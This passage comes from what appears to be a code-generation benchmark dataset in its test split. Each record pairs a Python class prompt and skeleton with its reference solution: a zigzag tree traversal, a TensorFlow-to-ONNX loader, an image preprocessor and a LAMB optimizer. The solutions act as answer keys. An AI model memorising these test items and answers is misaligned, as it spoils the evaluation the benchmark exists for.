zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and 
docstrings:\n- def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]: BFS with Reverse, Time: O(n), Space: O(n)\n- def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]: BFS without Reverse, Time: O(n), Space: O(n)", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]: BFS with Reverse, Time: O(n), Space: O(n)\n- def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]: BFS without Reverse, Time: O(n), Space: O(n)\n\n<|skeleton|>\nclass Solution:\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS with Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_0|>\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS without Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([])\n for _ in range(sz):\n node = q.popleft()\n result[-1].append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if level % 2 != 0:\n result[-1] = result[-1][::-1]\n level += 1\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([0] * sz)\n for i in range(sz):\n node = q.popleft()\n if level % 2 == 0:\n idx = i\n else:\n idx = sz - i - 1\n result[-1][idx] = node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n level += 1\n return result\n<|end_body_1|>\n", "revision_id": "72136e3487d239f5b37e2d6393e034262a6bf599", "skeleton": "<|skeleton|>\nclass Solution:\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS with Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_0|>\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS without Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS with Reverse, Time: O(n), Space: O(n)\"\"\"\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([])\n for _ in range(sz):\n node = q.popleft()\n result[-1].append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if level % 2 != 0:\n result[-1] = result[-1][::-1]\n level += 1\n return result\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS without Reverse, Time: O(n), Space: O(n)\"\"\"\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([0] * sz)\n for i in range(sz):\n node = q.popleft()\n if level % 2 == 0:\n idx = i\n else:\n idx = sz - i - 1\n result[-1][idx] = node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n level += 1\n return result\n", "source": "the_stack_v2_python_sparse", "source_path": "python/103-Binary Tree Zigzag Level Order Traversal.py", "source_repo": "cwza/leetcode", "split": "test", 
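
Both zigzagLevelOrder bodies recorded above are O(n) BFS traversals; the second avoids the per-level list reversal by writing each value at a mirrored index on odd levels. A self-contained sketch of that second variant, with a minimal TreeNode stand-in (not the LeetCode-provided class), runnable as-is:

from collections import deque

class TreeNode:
    def __init__(self, val, left=None, right=None):
        self.val, self.left, self.right = val, left, right

def zigzag_level_order(root):
    if root is None:
        return []
    q, level, result = deque([root]), 0, []
    while q:
        sz = len(q)
        result.append([0] * sz)
        for i in range(sz):
            node = q.popleft()
            # On odd levels, fill the level right-to-left instead of reversing.
            idx = i if level % 2 == 0 else sz - i - 1
            result[-1][idx] = node.val
            if node.left:
                q.append(node.left)
            if node.right:
                q.append(node.right)
        level += 1
    return result

tree = TreeNode(3, TreeNode(9), TreeNode(20, TreeNode(15), TreeNode(7)))
print(zigzag_level_order(tree))  # [[3], [20, 9], [15, 7]]
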
"star_events_count": 0} {"blob_id": "e87a8683d4300f34018575e8d42abaf0fb780b5c", "bodies": ["self._graph = graph\nself.opset = util.default(opset, 11)\nself.optimize = util.default(optimize, True)", "(graph, output_names), _ = util.invoke_if_callable(self._graph)\ninput_names = list(tf_util.get_input_metadata(graph).keys())\ngraphdef = graph.as_graph_def()\nif self.optimize:\n graphdef = tf2onnx.tfonnx.tf_optimize(input_names, output_names, graph.as_graph_def())\nwith tf.Graph().as_default() as graph, tf.compat.v1.Session(graph=graph) as sess:\n tf.import_graph_def(graphdef, name='')\n onnx_graph = tf2onnx.tfonnx.process_tf_graph(graph, input_names=input_names, output_names=output_names, opset=self.opset)\n if self.optimize:\n onnx_graph = tf2onnx.optimizer.optimize_graph(onnx_graph)\n return onnx_graph.make_model('model')"], "bodies_text": "<|body_start_0|>\n self._graph = graph\n self.opset = util.default(opset, 11)\n self.optimize = util.default(optimize, True)\n<|end_body_0|>\n\n<|body_start_1|>\n (graph, output_names), _ = util.invoke_if_callable(self._graph)\n input_names = list(tf_util.get_input_metadata(graph).keys())\n graphdef = graph.as_graph_def()\n if self.optimize:\n graphdef = tf2onnx.tfonnx.tf_optimize(input_names, output_names, graph.as_graph_def())\n with tf.Graph().as_default() as graph, tf.compat.v1.Session(graph=graph) as sess:\n tf.import_graph_def(graphdef, name='')\n onnx_graph = tf2onnx.tfonnx.process_tf_graph(graph, input_names=input_names, output_names=output_names, opset=self.opset)\n if self.optimize:\n onnx_graph = tf2onnx.optimizer.optimize_graph(onnx_graph)\n return onnx_graph.make_model('model')\n<|end_body_1|>\n", "class_docstring": "Functor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.", "class_name": "OnnxFromTfGraph", "detected_licenses": ["Apache-2.0", "BSD-3-Clause", "MIT", "ISC", "BSD-2-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass OnnxFromTfGraph:\n \"\"\"Functor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\"\"\"\n\n def __init__(self, graph, opset=None, optimize=None):\n \"\"\"Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. 
optimize (bool): Whether to use tf2onnx's graph optimization pass.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._graph = graph\n self.opset = util.default(opset, 11)\n self.optimize = util.default(optimize, True)\n<|end_body_0|>\n\n<|body_start_1|>\n (graph, output_names), _ = util.invoke_if_callable(self._graph)\n input_names = list(tf_util.get_input_metadata(graph).keys())\n graphdef = graph.as_graph_def()\n if self.optimize:\n graphdef = tf2onnx.tfonnx.tf_optimize(input_names, output_names, graph.as_graph_def())\n with tf.Graph().as_default() as graph, tf.compat.v1.Session(graph=graph) as sess:\n tf.import_graph_def(graphdef, name='')\n onnx_graph = tf2onnx.tfonnx.process_tf_graph(graph, input_names=input_names, output_names=output_names, opset=self.opset)\n if self.optimize:\n onnx_graph = tf2onnx.optimizer.optimize_graph(onnx_graph)\n return onnx_graph.make_model('model')\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000329", "length_bytes": 37448, "license_type": "permissive", "methods": [{"docstring": "Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.", "name": "__init__", "signature": "def __init__(self, graph, opset=None, optimize=None)"}, {"docstring": "Returns: onnx.ModelProto: The ONNX model.", "name": "call_impl", "signature": "def call_impl(self)"}], "n_methods": 2, "prompt": "Implement the Python class `OnnxFromTfGraph` described below.\n\nClass description:\nFunctor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\n\nMethod signatures and docstrings:\n- def __init__(self, graph, opset=None, optimize=None): Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.\n- def call_impl(self): Returns: onnx.ModelProto: The ONNX model.", "prompted_full_text": "Implement the Python class `OnnxFromTfGraph` described below.\n\nClass description:\nFunctor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\n\nMethod signatures and docstrings:\n- def __init__(self, graph, opset=None, optimize=None): Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.\n- def call_impl(self): Returns: onnx.ModelProto: The ONNX model.\n\n<|skeleton|>\nclass OnnxFromTfGraph:\n \"\"\"Functor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\"\"\"\n\n def __init__(self, graph, opset=None, optimize=None):\n \"\"\"Converts a TensorFlow model into ONNX. 
Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._graph = graph\n self.opset = util.default(opset, 11)\n self.optimize = util.default(optimize, True)\n<|end_body_0|>\n\n<|body_start_1|>\n (graph, output_names), _ = util.invoke_if_callable(self._graph)\n input_names = list(tf_util.get_input_metadata(graph).keys())\n graphdef = graph.as_graph_def()\n if self.optimize:\n graphdef = tf2onnx.tfonnx.tf_optimize(input_names, output_names, graph.as_graph_def())\n with tf.Graph().as_default() as graph, tf.compat.v1.Session(graph=graph) as sess:\n tf.import_graph_def(graphdef, name='')\n onnx_graph = tf2onnx.tfonnx.process_tf_graph(graph, input_names=input_names, output_names=output_names, opset=self.opset)\n if self.optimize:\n onnx_graph = tf2onnx.optimizer.optimize_graph(onnx_graph)\n return onnx_graph.make_model('model')\n<|end_body_1|>\n", "revision_id": "a167852705d74bcc619d8fad0af4b9e4d84472fc", "skeleton": "<|skeleton|>\nclass OnnxFromTfGraph:\n \"\"\"Functor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\"\"\"\n\n def __init__(self, graph, opset=None, optimize=None):\n \"\"\"Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. optimize (bool): Whether to use tf2onnx's graph optimization pass.\"\"\"\n <|body_0|>\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class OnnxFromTfGraph:\n \"\"\"Functor that loads a TensorFlow graph and converts it to ONNX using the tf2onnx converter.\"\"\"\n\n def __init__(self, graph, opset=None, optimize=None):\n \"\"\"Converts a TensorFlow model into ONNX. Args: graph (Union[Tuple[tf.Graph, Sequence[str]], Callable() -> Tuple[tf.Graph, Sequence[str]]]): A tuple containing a TensorFlow graph and output names or a callable that returns one. opset (int): The ONNX opset to use during conversion. 
optimize (bool): Whether to use tf2onnx's graph optimization pass.\"\"\"\n self._graph = graph\n self.opset = util.default(opset, 11)\n self.optimize = util.default(optimize, True)\n\n def call_impl(self):\n \"\"\"Returns: onnx.ModelProto: The ONNX model.\"\"\"\n (graph, output_names), _ = util.invoke_if_callable(self._graph)\n input_names = list(tf_util.get_input_metadata(graph).keys())\n graphdef = graph.as_graph_def()\n if self.optimize:\n graphdef = tf2onnx.tfonnx.tf_optimize(input_names, output_names, graph.as_graph_def())\n with tf.Graph().as_default() as graph, tf.compat.v1.Session(graph=graph) as sess:\n tf.import_graph_def(graphdef, name='')\n onnx_graph = tf2onnx.tfonnx.process_tf_graph(graph, input_names=input_names, output_names=output_names, opset=self.opset)\n if self.optimize:\n onnx_graph = tf2onnx.optimizer.optimize_graph(onnx_graph)\n return onnx_graph.make_model('model')\n", "source": "the_stack_v2_python_sparse", "source_path": "tools/Polygraphy/polygraphy/backend/onnx/loader.py", "source_repo": "NVIDIA/TensorRT", "split": "test", "star_events_count": 8026} {"blob_id": "59781d4fd0cbfba2d8c0719ea0ffab2033269ac7", "bodies": ["self.scale = scale\nself.bias = bias\nself.rgb = rgb", "if image.shape[0] != requiredHeight or image.shape[1] != requiredWidth:\n image = cv2.resize(image, (requiredWidth, requiredHeight))\nif self.rgb:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\nimage = image.astype(np.float32)\nif self.scale is not None:\n image *= self.scale\nif self.bias is not None:\n image += self.bias\nreturn image"], "bodies_text": "<|body_start_0|>\n self.scale = scale\n self.bias = bias\n self.rgb = rgb\n<|end_body_0|>\n\n<|body_start_1|>\n if image.shape[0] != requiredHeight or image.shape[1] != requiredWidth:\n image = cv2.resize(image, (requiredWidth, requiredHeight))\n if self.rgb:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = image.astype(np.float32)\n if self.scale is not None:\n image *= self.scale\n if self.bias is not None:\n image += self.bias\n return image\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Preprocessor", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Preprocessor:\n\n def __init__(self, scale=None, bias=None, rgb=None):\n \"\"\"Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\"\"\"\n <|body_0|>\n\n def __call__(self, image, requiredWidth, requiredHeight):\n \"\"\"Run the required preprocessing steps on an input image image : np.ndarray containing the image data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.scale = scale\n self.bias = bias\n self.rgb = rgb\n<|end_body_0|>\n\n<|body_start_1|>\n if image.shape[0] != requiredHeight or image.shape[1] != requiredWidth:\n image = cv2.resize(image, (requiredWidth, requiredHeight))\n if self.rgb:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = image.astype(np.float32)\n if self.scale is not None:\n image *= self.scale\n if self.bias is not None:\n image += self.bias\n return image\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000330", "length_bytes": 5320, "license_type": "permissive", "methods": [{"docstring": "Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor 
applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)", "name": "__init__", "signature": "def __init__(self, scale=None, bias=None, rgb=None)"}, {"docstring": "Run the required preprocessing steps on an input image image : np.ndarray containing the image data", "name": "__call__", "signature": "def __call__(self, image, requiredWidth, requiredHeight)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_007218", "prompt": "Implement the Python class `Preprocessor` described below.\n\nClass description:\nImplement the Preprocessor class.\n\nMethod signatures and docstrings:\n- def __init__(self, scale=None, bias=None, rgb=None): Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\n- def __call__(self, image, requiredWidth, requiredHeight): Run the required preprocessing steps on an input image image : np.ndarray containing the image data", "prompted_full_text": "Implement the Python class `Preprocessor` described below.\n\nClass description:\nImplement the Preprocessor class.\n\nMethod signatures and docstrings:\n- def __init__(self, scale=None, bias=None, rgb=None): Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\n- def __call__(self, image, requiredWidth, requiredHeight): Run the required preprocessing steps on an input image image : np.ndarray containing the image data\n\n<|skeleton|>\nclass Preprocessor:\n\n def __init__(self, scale=None, bias=None, rgb=None):\n \"\"\"Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\"\"\"\n <|body_0|>\n\n def __call__(self, image, requiredWidth, requiredHeight):\n \"\"\"Run the required preprocessing steps on an input image image : np.ndarray containing the image data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.scale = scale\n self.bias = bias\n self.rgb = rgb\n<|end_body_0|>\n\n<|body_start_1|>\n if image.shape[0] != requiredHeight or image.shape[1] != requiredWidth:\n image = cv2.resize(image, (requiredWidth, requiredHeight))\n if self.rgb:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = image.astype(np.float32)\n if self.scale is not None:\n image *= self.scale\n if self.bias is not None:\n image += self.bias\n return image\n<|end_body_1|>\n", "revision_id": "1510ecbbb6b4a43b9f1f9503c87ec66216200677", "skeleton": "<|skeleton|>\nclass Preprocessor:\n\n def __init__(self, scale=None, bias=None, rgb=None):\n \"\"\"Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\"\"\"\n <|body_0|>\n\n def __call__(self, image, requiredWidth, requiredHeight):\n 
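
# A hedged usage sketch for the Preprocessor class recorded above. The
# scale/bias values and frame size are illustrative assumptions, not taken
# from the source; cv2 and numpy are required, as the recorded bodies assume.
import cv2
import numpy as np

pre = Preprocessor(scale=1.0 / 255.0,
                   bias=np.array([-0.5, -0.5, -0.5], dtype=np.float32),
                   rgb=True)
frame = np.zeros((480, 640, 3), dtype=np.uint8)   # stand-in for a BGR frame
blob = pre(frame, requiredWidth=224, requiredHeight=224)
print(blob.shape, blob.dtype, float(blob.min()))  # (224, 224, 3) float32 -0.5
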
\"\"\"Run the required preprocessing steps on an input image image : np.ndarray containing the image data\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Preprocessor:\n def __init__(self, scale=None, bias=None, rgb=None):\n \"\"\"Create a preprocessing object to handle image transformations required for network to run scale : float Scale factor applied to image after conversion to float bias : 3-element np.array Bias applied to image after scaling rgb : bool Set to true to convert 3 channel data to RGB (from BGR)\"\"\"\n self.scale = scale\n self.bias = bias\n self.rgb = rgb\n\n def __call__(self, image, requiredWidth, requiredHeight):\n \"\"\"Run the required preprocessing steps on an input image image : np.ndarray containing the image data\"\"\"\n if image.shape[0] != requiredHeight or image.shape[1] != requiredWidth:\n image = cv2.resize(image, (requiredWidth, requiredHeight))\n if self.rgb:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image = image.astype(np.float32)\n if self.scale is not None:\n image *= self.scale\n if self.bias is not None:\n image += self.bias\n return image\n", "source": "the_stack_v2_python_sparse", "source_path": "deploy_python/openem/models.py", "source_repo": "bryan-flywire/openem", "split": "test", "star_events_count": 0} {"blob_id": "899813d6c430bada0e3e38b84264c07ff6d6cb91", "bodies": ["super(LAMBOptimizer_v2, self).__init__(False, name)\nself.learning_rate = learning_rate\nself.weight_decay_rate = weight_decay_rate\nself.beta_1 = beta_1\nself.beta_2 = beta_2\nself.epsilon = epsilon\nself.exclude_from_weight_decay = exclude_from_weight_decay\nself.include_in_weight_decay = include_in_weight_decay\nif exclude_from_layer_adaptation:\n self.exclude_from_layer_adaptation = exclude_from_layer_adaptation\nelse:\n self.exclude_from_layer_adaptation = exclude_from_weight_decay", "assignments = []\nif learning_rate is None:\n learning_rate = self.learning_rate\n tf.logging.info('***** use default learning rate ***** ', learning_rate)\nelse:\n tf.logging.info('***** use provided learning rate ***** ', learning_rate)\nfor grad, param in grads_and_vars:\n if grad is None or param is None:\n continue\n param_name = self._get_variable_name(param.name)\n tf.logging.info('***** apply gradients parameter name ***** %s', param_name)\n tf.logging.info('***** param: %s learning rate: %s ***** ', param_name, str(learning_rate))\n m = tf.get_variable(name=param_name + '/adam_m', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n v = tf.get_variable(name=param_name + '/adam_v', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n next_m = tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad)\n next_v = tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2, tf.square(grad))\n update = next_m / (tf.sqrt(next_v) + self.epsilon)\n if self._do_use_weight_decay(param_name):\n update += self.weight_decay_rate * param\n ratio = 1.0\n if self._do_layer_adaptation(param_name):\n w_norm = linalg_ops.norm(param, ord=2)\n g_norm = linalg_ops.norm(update, ord=2)\n ratio = array_ops.where(math_ops.greater(w_norm, 0), array_ops.where(math_ops.greater(g_norm, 0), w_norm / g_norm, 1.0), 1.0)\n update_with_lr = ratio * learning_rate * update\n next_param = param - update_with_lr\n assignments.extend([param.assign(next_param), m.assign(next_m), 
v.assign(next_v)])\nreturn tf.group(*assignments, name=name)", "if not self.weight_decay_rate:\n return False\nif self.include_in_weight_decay:\n for r in self.include_in_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Include %s in weight decay', param_name)\n return True\nif self.exclude_from_weight_decay:\n for r in self.exclude_from_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Adam WD excludes %s', param_name)\n return False\nreturn True", "if self.exclude_from_layer_adaptation:\n for r in self.exclude_from_layer_adaptation:\n if re.search(r, param_name) is not None:\n return False\nreturn True", "m = re.match('^(.*):\\\\d+$', param_name)\nif m is not None:\n param_name = m.group(1)\nreturn param_name"], "bodies_text": "<|body_start_0|>\n super(LAMBOptimizer_v2, self).__init__(False, name)\n self.learning_rate = learning_rate\n self.weight_decay_rate = weight_decay_rate\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n self.epsilon = epsilon\n self.exclude_from_weight_decay = exclude_from_weight_decay\n self.include_in_weight_decay = include_in_weight_decay\n if exclude_from_layer_adaptation:\n self.exclude_from_layer_adaptation = exclude_from_layer_adaptation\n else:\n self.exclude_from_layer_adaptation = exclude_from_weight_decay\n<|end_body_0|>\n\n<|body_start_1|>\n assignments = []\n if learning_rate is None:\n learning_rate = self.learning_rate\n tf.logging.info('***** use default learning rate ***** ', learning_rate)\n else:\n tf.logging.info('***** use provided learning rate ***** ', learning_rate)\n for grad, param in grads_and_vars:\n if grad is None or param is None:\n continue\n param_name = self._get_variable_name(param.name)\n tf.logging.info('***** apply gradients parameter name ***** %s', param_name)\n tf.logging.info('***** param: %s learning rate: %s ***** ', param_name, str(learning_rate))\n m = tf.get_variable(name=param_name + '/adam_m', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n v = tf.get_variable(name=param_name + '/adam_v', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n next_m = tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad)\n next_v = tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2, tf.square(grad))\n update = next_m / (tf.sqrt(next_v) + self.epsilon)\n if self._do_use_weight_decay(param_name):\n update += self.weight_decay_rate * param\n ratio = 1.0\n if self._do_layer_adaptation(param_name):\n w_norm = linalg_ops.norm(param, ord=2)\n g_norm = linalg_ops.norm(update, ord=2)\n ratio = array_ops.where(math_ops.greater(w_norm, 0), array_ops.where(math_ops.greater(g_norm, 0), w_norm / g_norm, 1.0), 1.0)\n update_with_lr = ratio * learning_rate * update\n next_param = param - update_with_lr\n assignments.extend([param.assign(next_param), m.assign(next_m), v.assign(next_v)])\n return tf.group(*assignments, name=name)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.weight_decay_rate:\n return False\n if self.include_in_weight_decay:\n for r in self.include_in_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Include %s in weight decay', param_name)\n return True\n if self.exclude_from_weight_decay:\n for r in self.exclude_from_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Adam WD excludes %s', param_name)\n return False\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n if self.exclude_from_layer_adaptation:\n 
for r in self.exclude_from_layer_adaptation:\n if re.search(r, param_name) is not None:\n return False\n return True\n<|end_body_3|>\n\n<|body_start_4|>\n m = re.match('^(.*):\\\\d+$', param_name)\n if m is not None:\n param_name = m.group(1)\n return param_name\n<|end_body_4|>\n", "class_docstring": "LAMB (Layer-wise Adaptive Moments optimizer for Batch training).", "class_name": "LAMBOptimizer_v2", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass LAMBOptimizer_v2:\n \"\"\"LAMB (Layer-wise Adaptive Moments optimizer for Batch training).\"\"\"\n\n def __init__(self, learning_rate, weight_decay_rate=0.0, beta_1=0.9, beta_2=0.999, epsilon=1e-06, exclude_from_weight_decay=None, include_in_weight_decay=['r_s_bias', 'r_r_bias', 'r_w_bias'], exclude_from_layer_adaptation=None, name='LAMBOptimizer'):\n \"\"\"Constructs a LAMBOptimizer.\"\"\"\n <|body_0|>\n\n def apply_gradients(self, grads_and_vars, global_step=None, name=None, learning_rate=None):\n \"\"\"See base class.\"\"\"\n <|body_1|>\n\n def _do_use_weight_decay(self, param_name):\n \"\"\"Whether to use L2 weight decay for `param_name`.\"\"\"\n <|body_2|>\n\n def _do_layer_adaptation(self, param_name):\n \"\"\"Whether to do layer-wise learning rate adaptation for `param_name`.\"\"\"\n <|body_3|>\n\n def _get_variable_name(self, param_name):\n \"\"\"Get the variable name from the tensor name.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super(LAMBOptimizer_v2, self).__init__(False, name)\n self.learning_rate = learning_rate\n self.weight_decay_rate = weight_decay_rate\n self.beta_1 = beta_1\n self.beta_2 = beta_2\n self.epsilon = epsilon\n self.exclude_from_weight_decay = exclude_from_weight_decay\n self.include_in_weight_decay = include_in_weight_decay\n if exclude_from_layer_adaptation:\n self.exclude_from_layer_adaptation = exclude_from_layer_adaptation\n else:\n self.exclude_from_layer_adaptation = exclude_from_weight_decay\n<|end_body_0|>\n\n<|body_start_1|>\n assignments = []\n if learning_rate is None:\n learning_rate = self.learning_rate\n tf.logging.info('***** use default learning rate ***** ', learning_rate)\n else:\n tf.logging.info('***** use provided learning rate ***** ', learning_rate)\n for grad, param in grads_and_vars:\n if grad is None or param is None:\n continue\n param_name = self._get_variable_name(param.name)\n tf.logging.info('***** apply gradients parameter name ***** %s', param_name)\n tf.logging.info('***** param: %s learning rate: %s ***** ', param_name, str(learning_rate))\n m = tf.get_variable(name=param_name + '/adam_m', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n v = tf.get_variable(name=param_name + '/adam_v', shape=param.shape.as_list(), dtype=tf.float32, trainable=False, initializer=tf.zeros_initializer())\n next_m = tf.multiply(self.beta_1, m) + tf.multiply(1.0 - self.beta_1, grad)\n next_v = tf.multiply(self.beta_2, v) + tf.multiply(1.0 - self.beta_2, tf.square(grad))\n update = next_m / (tf.sqrt(next_v) + self.epsilon)\n if self._do_use_weight_decay(param_name):\n update += self.weight_decay_rate * param\n ratio = 1.0\n if self._do_layer_adaptation(param_name):\n w_norm = linalg_ops.norm(param, ord=2)\n g_norm = linalg_ops.norm(update, ord=2)\n ratio = array_ops.where(math_ops.greater(w_norm, 0), array_ops.where(math_ops.greater(g_norm, 0), w_norm / g_norm, 1.0), 1.0)\n update_with_lr = ratio * learning_rate * update\n next_param = param - 
update_with_lr\n assignments.extend([param.assign(next_param), m.assign(next_m), v.assign(next_v)])\n return tf.group(*assignments, name=name)\n<|end_body_1|>\n\n<|body_start_2|>\n if not self.weight_decay_rate:\n return False\n if self.include_in_weight_decay:\n for r in self.include_in_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Include %s in weight decay', param_name)\n return True\n if self.exclude_from_weight_decay:\n for r in self.exclude_from_weight_decay:\n if re.search(r, param_name) is not None:\n tf.logging.info('Adam WD excludes %s', param_name)\n return False\n return True\n<|end_body_2|>\n\n<|body_start_3|>\n if self.exclude_from_layer_adaptation:\n for r in self.exclude_from_layer_adaptation:\n if re.search(r, param_name) is not None:\n return False\n return True\n<|end_body_3|>\n\n<|body_start_4|>\n m = re.match('^(.*):\\\\d+$', param_name)\n if m is not None:\n param_name = m.group(1)\n return param_name\n<|end_body_4|>\n", "id": 